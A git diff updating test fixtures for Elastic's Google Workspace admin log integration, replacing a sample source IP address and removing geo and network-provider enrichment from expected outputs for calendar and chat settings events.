@@ -116,35 +98,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375121400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:25.433469800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "DELETE_BUILDING", "id": "1", @@ -174,7 +138,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -198,35 +162,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375128600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:25.433476300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_BUILDING", "id": 
"1", @@ -256,7 +202,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -280,35 +226,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375134300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:25.433482200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CREATE_CALENDAR_RESOURCE", "id": "1", @@ -338,7 +266,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -362,35 +290,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375138900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:25.433486400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "DELETE_CALENDAR_RESOURCE", "id": "1", @@ -420,7 +330,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -444,35 +354,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375143900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:25.433491100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CREATE_CALENDAR_RESOURCE_FEATURE", "id": "1", @@ -502,7 +394,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -526,35 +418,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375148500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:25.433496600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "DELETE_CALENDAR_RESOURCE_FEATURE", "id": "1", @@ -584,7 +458,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -608,35 +482,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375152700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:25.433502Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "provider": "admin", 
"action": "UPDATE_CALENDAR_RESOURCE_FEATURE", "id": "1", @@ -667,7 +523,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -691,35 +547,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375189700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RENAME_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:25.433507100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RENAME_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "RENAME_CALENDAR_RESOURCE", "id": "1", 
@@ -749,7 +587,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -773,35 +611,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375196500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:25.433512700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": 
"UPDATE_CALENDAR_RESOURCE", "id": "1", @@ -831,7 +651,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -855,35 +675,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375201400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CHANGE_CALENDAR_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:25.433517300Z", + "original": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CHANGE_CALENDAR_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CALENDAR_SETTING", "id": "1", @@ -915,7 +717,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -939,35 +741,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375206900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CANCEL_CALENDAR_EVENTS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:25.433520800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CANCEL_CALENDAR_EVENTS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CANCEL_CALENDAR_EVENTS", "id": "1", @@ -1003,7 +787,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1027,35 +811,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375211800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RELEASE_CALENDAR_RESOURCES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:25.433542300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RELEASE_CALENDAR_RESOURCES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RELEASE_CALENDAR_RESOURCES", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log index b078b332402..164c64906f5 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log 
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log 
@@ -1,4 +1,4 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_CREATE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_DELETE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_MODIFY_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"CHANGE_CHAT_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_CREATE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_DELETE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_MODIFY_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
